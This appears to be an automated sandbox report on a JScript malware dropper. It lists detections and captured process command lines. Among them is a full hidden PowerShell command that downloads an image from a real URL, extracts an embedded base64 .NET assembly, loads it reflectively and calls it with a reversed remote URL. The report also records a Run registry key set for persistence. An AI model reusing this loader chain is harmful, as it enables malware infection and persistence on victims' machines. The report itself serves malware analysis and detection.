Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000003.00000002.1778936511.000001CB955A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1804717263.000001CB9DB90000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ?", "0", "false");

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBF? ? ? ? ?E4? ? ? ? ?R? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7?

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.NGRO/gol/moc.onapnape//:sptth' , '1' , 'C:\ProgramData\' , 'alarvice','InstallUtil','desativado'))"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B931B9A push eax; retf		3_2_00007FFD9B931BE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B931A75 push eax; retf		3_2_00007FFD9B931BE1

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\alarvice.js

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
